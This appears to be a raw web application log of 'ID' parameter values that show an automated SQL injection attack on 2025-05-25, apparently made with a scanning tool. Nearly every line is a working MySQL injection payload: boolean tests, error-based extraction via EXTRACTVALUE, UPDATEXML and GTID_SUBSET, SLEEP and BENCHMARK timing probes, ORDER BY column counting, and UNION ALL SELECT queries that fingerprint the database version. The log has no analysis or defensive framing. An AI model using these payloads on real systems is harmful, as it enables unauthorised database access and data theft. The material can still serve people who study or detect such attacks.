ID: admin - User: admin - Time: 2025-05-25 16:41:38
ID: 1 - User: admin - Time: 2025-05-25 16:41:41
ID: 2 - User: admin - Time: 2025-05-25 16:41:44
ID: 3 - User: admin - Time: 2025-05-25 16:41:47
ID: 1 - User: admin - Time: 2025-05-25 16:45:24
ID: 1’--+ - User: admin - Time: 2025-05-25 16:48:21
ID: 1’--  - User: admin - Time: 2025-05-25 16:49:25
ID: 1 - User: admin - Time: 2025-05-25 16:56:46
ID: 1 - User: admin - Time: 2025-05-25 16:56:46
ID: 1.('.)"..,, - User: admin - Time: 2025-05-25 16:56:47
ID: 1'rHjejl<'">bUWtBE - User: admin - Time: 2025-05-25 16:56:47
ID: 1 - User: admin - Time: 2025-05-25 16:56:48
ID: 1)/**/AND/**/1722=7492--/**/vobr - User: admin - Time: 2025-05-25 16:56:49
ID: 1)/**/AND/**/6846=6846--/**/UPvj - User: admin - Time: 2025-05-25 16:56:49
ID: 1)/**/AND/**/2611=1645/**/AND/**/(8315=8315 - User: admin - Time: 2025-05-25 16:56:50
ID: 1)/**/AND/**/6846=6846/**/AND/**/(5696=5696 - User: admin - Time: 2025-05-25 16:56:50
ID: 1))/**/AND/**/8173=4957/**/AND/**/((5043=5043 - User: admin - Time: 2025-05-25 16:56:51
ID: 1))/**/AND/**/6846=6846/**/AND/**/((4255=4255 - User: admin - Time: 2025-05-25 16:56:52
ID: 1)))/**/AND/**/1215=9923/**/AND/**/(((2066=2066 - User: admin - Time: 2025-05-25 16:56:52
ID: 1)))/**/AND/**/6846=6846/**/AND/**/(((8071=8071 - User: admin - Time: 2025-05-25 16:56:53
ID: 1/**/AND/**/9955=7749 - User: admin - Time: 2025-05-25 16:56:53
ID: 1/**/AND/**/6846=6846 - User: admin - Time: 2025-05-25 16:56:54
ID: 1/**/AND/**/3922=8464--/**/lReB - User: admin - Time: 2025-05-25 16:56:54
ID: 1/**/AND/**/6846=6846--/**/iXow - User: admin - Time: 2025-05-25 16:56:55
ID: 1/**/AND/**/5530=7438#/**/MBPy - User: admin - Time: 2025-05-25 16:56:55
ID: 1/**/AND/**/6846=6846#/**/dqOy - User: admin - Time: 2025-05-25 16:56:56
ID: 1)/**/WHERE/**/3137=3137/**/AND/**/8692=6308--/**/boXx - User: admin - Time: 2025-05-25 16:56:57
ID: 1)/**/WHERE/**/8251=8251/**/AND/**/6846=6846--/**/iYiS - User: admin - Time: 2025-05-25 16:56:57
ID: 1/**/WHERE/**/2995=2995/**/AND/**/8437=8638--/**/rGob - User: admin - Time: 2025-05-25 16:56:58
ID: 1/**/WHERE/**/6688=6688/**/AND/**/6846=6846--/**/cZDN - User: admin - Time: 2025-05-25 16:56:58
ID: 1+(SELECT/**/MyZq/**/WHERE/**/5550=5550/**/AND/**/4780=7099)+ - User: admin - Time: 2025-05-25 16:56:59
ID: 1+(SELECT/**/PYCU/**/WHERE/**/4669=4669/**/AND/**/6846=6846)+ - User: admin - Time: 2025-05-25 16:56:59
ID: 1))/**/AS/**/NKai/**/WHERE/**/4045=4045/**/AND/**/1400=9718--/**/YYWN - User: admin - Time: 2025-05-25 16:57:00
ID: 1))/**/AS/**/Dwqe/**/WHERE/**/1224=1224/**/AND/**/6846=6846--/**/uhgo - User: admin - Time: 2025-05-25 16:57:00
ID: 1)/**/AS/**/RfGn/**/WHERE/**/5818=5818/**/AND/**/7729=7242--/**/oQlm - User: admin - Time: 2025-05-25 16:57:01
ID: 1)/**/AS/**/heQK/**/WHERE/**/4630=4630/**/AND/**/6846=6846--/**/DrGY - User: admin - Time: 2025-05-25 16:57:01
ID: 1`/**/WHERE/**/6452=6452/**/AND/**/4968=6597--/**/HcpZ - User: admin - Time: 2025-05-25 16:57:02
ID: 1`/**/WHERE/**/9379=9379/**/AND/**/6846=6846--/**/PZBI - User: admin - Time: 2025-05-25 16:57:02
ID: 1`)/**/WHERE/**/1549=1549/**/AND/**/3100=9316--/**/RAoI - User: admin - Time: 2025-05-25 16:57:03
ID: 1`)/**/WHERE/**/5043=5043/**/AND/**/6846=6846--/**/KztE - User: admin - Time: 2025-05-25 16:57:04
ID: 1`=`1`/**/AND/**/8632=7297/**/AND/**/`1`=`1 - User: admin - Time: 2025-05-25 16:57:04
ID: 1`=`1`/**/AND/**/6846=6846/**/AND/**/`1`=`1 - User: admin - Time: 2025-05-25 16:57:05
ID: 1]-(SELECT/**/0/**/WHERE/**/4251=4251/**/AND/**/6447=6236)|[1 - User: admin - Time: 2025-05-25 16:57:05
ID: 1]-(SELECT/**/0/**/WHERE/**/5306=5306/**/AND/**/6846=6846)|[1 - User: admin - Time: 2025-05-25 16:57:06
ID: 1')/**/AND/**/9707=5309--/**/sbXj - User: admin - Time: 2025-05-25 16:57:06
ID: 1')/**/AND/**/6846=6846--/**/wzJD - User: admin - Time: 2025-05-25 16:57:07
ID: 1'/**/AND/**/8099=5927--/**/XLZG - User: admin - Time: 2025-05-25 16:57:07
ID: 1'/**/AND/**/6846=6846--/**/pCco - User: admin - Time: 2025-05-25 16:57:08
ID: 1"/**/AND/**/3267=6336--/**/ONmo - User: admin - Time: 2025-05-25 16:57:09
ID: 1"/**/AND/**/6846=6846--/**/LoVP - User: admin - Time: 2025-05-25 16:57:09
ID: 1')/**/AND/**/8731=9965/**/AND/**/('AvJe'='AvJe - User: admin - Time: 2025-05-25 16:57:10
ID: 1')/**/AND/**/6846=6846/**/AND/**/('wzby'='wzby - User: admin - Time: 2025-05-25 16:57:10
ID: 1'))/**/AND/**/5449=9439/**/AND/**/(('ilva'='ilva - User: admin - Time: 2025-05-25 16:57:11
ID: 1'))/**/AND/**/6846=6846/**/AND/**/(('OByW'='OByW - User: admin - Time: 2025-05-25 16:57:11
ID: 1')))/**/AND/**/9045=8373/**/AND/**/((('Pqst'='Pqst - User: admin - Time: 2025-05-25 16:57:12
ID: 1')))/**/AND/**/6846=6846/**/AND/**/((('CCRm'='CCRm - User: admin - Time: 2025-05-25 16:57:13
ID: 1'/**/AND/**/2748=8393/**/AND/**/'NMsn'='NMsn - User: admin - Time: 2025-05-25 16:57:13
ID: 1'/**/AND/**/6846=6846/**/AND/**/'mnKB'='mnKB - User: admin - Time: 2025-05-25 16:57:14
ID: 1')/**/AND/**/6906=9024/**/AND/**/('FCnl'/**/LIKE/**/'FCnl - User: admin - Time: 2025-05-25 16:57:14
ID: 1')/**/AND/**/6846=6846/**/AND/**/('vimh'/**/LIKE/**/'vimh - User: admin - Time: 2025-05-25 16:57:15
ID: 1'))/**/AND/**/9690=4980/**/AND/**/(('TehK'/**/LIKE/**/'TehK - User: admin - Time: 2025-05-25 16:57:16
ID: 1 - User: admin - Time: 2025-05-25 16:57:19
ID: 1 - User: admin - Time: 2025-05-25 16:57:20
ID: 1.(".(),..' - User: admin - Time: 2025-05-25 16:57:20
ID: 1'SnTBIa<'">NHLkoU - User: admin - Time: 2025-05-25 16:57:20
ID: 1) AND 2312=6252 AND (1057=1057 - User: admin - Time: 2025-05-25 16:57:20
ID: 1) AND 3173=3173 AND (6200=6200 - User: admin - Time: 2025-05-25 16:57:20
ID: 1 AND 5774=8161 - User: admin - Time: 2025-05-25 16:57:20
ID: 1 AND 3173=3173 - User: admin - Time: 2025-05-25 16:57:20
ID: 1 AND 5262=4756-- UmJk - User: admin - Time: 2025-05-25 16:57:20
ID: 1 AND 3173=3173-- gZaA - User: admin - Time: 2025-05-25 16:57:20
ID: 1') AND 5597=2543 AND ('DAYz'='DAYz - User: admin - Time: 2025-05-25 16:57:20
ID: 1') AND 3173=3173 AND ('GsbJ'='GsbJ - User: admin - Time: 2025-05-25 16:57:20
ID: 1' AND 1329=6024 AND 'SjdC'='SjdC - User: admin - Time: 2025-05-25 16:57:21
ID: 1' AND 3173=3173 AND 'EMgh'='EMgh - User: admin - Time: 2025-05-25 16:57:21
ID: (SELECT (CASE WHEN (2553=1477) THEN 1 ELSE (SELECT 1477 UNION SELECT 3220) END)) - User: admin - Time: 2025-05-25 16:57:21
ID: (SELECT (CASE WHEN (8928=8928) THEN 1 ELSE (SELECT 2432 UNION SELECT 4631) END)) - User: admin - Time: 2025-05-25 16:57:21
ID: (SELECT CONCAT(CONCAT(0x71707a7671,(CASE WHEN (9672=9672) THEN 0x31 ELSE 0x30 END)),0x7170706271)) - User: admin - Time: 2025-05-25 16:57:21
ID: 1) AND 3371=1242# - User: admin - Time: 2025-05-25 16:57:21
ID: 1) AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1)) AND 2862=6566# - User: admin - Time: 2025-05-25 16:57:21
ID: 1)) AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1))) AND 4287=8141# - User: admin - Time: 2025-05-25 16:57:21
ID: 1))) AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1 AND 7897=4224# - User: admin - Time: 2025-05-25 16:57:21
ID: 1 AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1)) AS arJz WHERE 3247=3247 AND 9985=7229# - User: admin - Time: 2025-05-25 16:57:21
ID: 1)) AS JhQI WHERE 9965=9965 AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1) AS IXcP WHERE 4390=4390 AND 4489=8842# - User: admin - Time: 2025-05-25 16:57:21
ID: 1) AS JQPx WHERE 8861=8861 AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1` WHERE 4942=4942 AND 3288=3898# - User: admin - Time: 2025-05-25 16:57:21
ID: 1` WHERE 7983=7983 AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1`) WHERE 5979=5979 AND 6070=1152# - User: admin - Time: 2025-05-25 16:57:21
ID: 1`) WHERE 9508=9508 AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1') AND 5871=8337# - User: admin - Time: 2025-05-25 16:57:21
ID: 1') AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1' AND 2216=3343# - User: admin - Time: 2025-05-25 16:57:21
ID: 1' AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1" AND 1363=3469# - User: admin - Time: 2025-05-25 16:57:21
ID: 1" AND 1717=1717# - User: admin - Time: 2025-05-25 16:57:21
ID: 1" AND 5364=1003# - User: admin - Time: 2025-05-25 16:57:21
ID: 1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71707a7671,(SELECT (ELT(3884=3884,1))),0x7170706271,0x78))s), 8446744073709551610, 8446744073709551610)))-- Pumi - User: admin - Time: 2025-05-25 16:57:21
ID: 1" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71707a7671,(SELECT (ELT(3286=3286,1))),0x7170706271,0x78))s), 8446744073709551610, 8446744073709551610)))-- aolF - User: admin - Time: 2025-05-25 16:57:21
ID: 1" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a7671,(SELECT (ELT(5938=5938,1))),0x7170706271,0x78))x))-- NRsB - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a7671,(SELECT (ELT(3236=3236,1))),0x7170706271,0x78))x))-- CiOl - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND GTID_SUBSET(CONCAT(0x71707a7671,(SELECT (ELT(7881=7881,1))),0x7170706271),7881)-- Mvou - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR GTID_SUBSET(CONCAT(0x71707a7671,(SELECT (ELT(2999=2999,1))),0x7170706271),2999)-- haQC - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71707a7671,(SELECT (ELT(6697=6697,1))),0x7170706271)) USING utf8)))-- ScVL - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71707a7671,(SELECT (ELT(7901=7901,1))),0x7170706271)) USING utf8)))-- wehM - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND (SELECT 2183 FROM(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(2183=2183,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zjDI - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR (SELECT 9680 FROM(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(9680=9680,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SyFD - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND EXTRACTVALUE(2379,CONCAT(0x5c,0x71707a7671,(SELECT (ELT(2379=2379,1))),0x7170706271))-- vUiI - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR EXTRACTVALUE(8816,CONCAT(0x5c,0x71707a7671,(SELECT (ELT(8816=8816,1))),0x7170706271))-- lHbd - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND UPDATEXML(3896,CONCAT(0x2e,0x71707a7671,(SELECT (ELT(3896=3896,1))),0x7170706271),7316)-- zpoC - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR UPDATEXML(7043,CONCAT(0x2e,0x71707a7671,(SELECT (ELT(7043=7043,1))),0x7170706271),2254)-- uoKp - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND ROW(1506,5635)>(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(1506=1506,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM (SELECT 4622 UNION SELECT 2352 UNION SELECT 6955 UNION SELECT 3698)a GROUP BY x)-- dLcr - User: admin - Time: 2025-05-25 16:57:22
ID: 1" OR ROW(9342,4694)>(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(9342=9342,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM (SELECT 5009 UNION SELECT 5538 UNION SELECT 1922 UNION SELECT 3861)a GROUP BY x)-- kiqP - User: admin - Time: 2025-05-25 16:57:22
ID: -5093 - User: admin - Time: 2025-05-25 16:57:22
ID: -4055" OR 1 GROUP BY CONCAT(0x71707a7671,(SELECT (CASE WHEN (1511=1511) THEN 1 ELSE 0 END)),0x7170706271,FLOOR(RAND(0)*2)) HAVING MIN(0)# - User: admin - Time: 2025-05-25 16:57:22
ID: 1" PROCEDURE ANALYSE(EXTRACTVALUE(1620,CONCAT(0x5c,0x71707a7671,(SELECT (CASE WHEN (1620=1620) THEN 1 ELSE 0 END)),0x7170706271)),1)-- Tltw - User: admin - Time: 2025-05-25 16:57:22
ID: (SELECT CONCAT(0x71707a7671,(ELT(7712=7712,1)),0x7170706271)) - User: admin - Time: 2025-05-25 16:57:22
ID: 1";SELECT SLEEP(5)# - User: admin - Time: 2025-05-25 16:57:22
ID: 1";SELECT SLEEP(5)-- JGly - User: admin - Time: 2025-05-25 16:57:22
ID: 1";(SELECT * FROM (SELECT(SLEEP(5)))CyGY)# - User: admin - Time: 2025-05-25 16:57:22
ID: 1";(SELECT * FROM (SELECT(SLEEP(5)))vXXh)-- scgv - User: admin - Time: 2025-05-25 16:57:22
ID: 1";SELECT BENCHMARK(5000000,MD5(0x6d496164))# - User: admin - Time: 2025-05-25 16:57:22
ID: 1";SELECT BENCHMARK(5000000,MD5(0x6275725a))-- PxWN - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND (SELECT 3405 FROM (SELECT(SLEEP(5)))AGYs)-- WnbY - User: admin - Time: 2025-05-25 16:57:22
ID: 1" AND (SELECT 3405 FROM (SELECT(SLEEP(0)))AGYs)-- WnbY - User: admin - Time: 2025-05-25 16:57:27
ID: 1" AND (SELECT 3405 FROM (SELECT(SLEEP(5)))AGYs)-- WnbY - User: admin - Time: 2025-05-25 16:57:27
ID: 1" ORDER BY 1# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" ORDER BY 8217# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" ORDER BY 10# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" ORDER BY 6# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" ORDER BY 8# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" ORDER BY 7# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT CONCAT(0x71707a7671,0x48566756795a4c6c467977515979596f64696a764b557474616f736e574f48777771556250536e41,0x7170706271),NULL,NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x52496e6f6d734f44634c59434a70426e4b76617669724751436650715166476c6158714a5a44665a,0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a7671,0x6e56664a756e777457434f7871444e4846576b4b53755a706e46624f6b696e634d76476858455845,0x7170706271),NULL,NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x6b6f517a42474758595665654d497677585176664c465777444e6d5043595958575a726861754f55,0x7170706271)# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x4b786768467a774d63687a58474f6f6c477246446a685a7759474a72657a426c7a4e63566b444371,0x7170706271),NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7671,0x504c73545a774a7a59706c6f66446e4873594d534b654d56586c78454b58746a46685447696e7263,0x7170706271),NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT CONCAT(0x71707a7671,0x77557a7863614f4a6d64,0x7170706271),NULL,NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x45446b496a6c63684851,0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:32
ID: 1" UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a7671,0x4f5974754d6c79584448,0x7170706271),NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: 1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x6545764c41426255426a,0x7170706271)# - User: admin - Time: 2025-05-25 16:57:33
ID: 1" UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x73716e7a6c6c4e514b6a,0x7170706271),NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: 1" UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7671,0x416d5543574e43526a43,0x7170706271),NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -2484" UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x4746414e52527968464c5a436f504a5a5861484c564b554a61564276595758744d76655370697556,0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -7539" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (3703=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3703) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -7550" UNION ALL SELECT NULL,CONCAT(0x71707a7671,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -3016" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -8815" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -9884" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -6188" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -7808" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
ID: -6178" UNION ALL SELECT NULL,CONCAT(0x71707a7671,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7170706271),NULL,NULL,NULL,NULL# - User: admin - Time: 2025-05-25 16:57:33
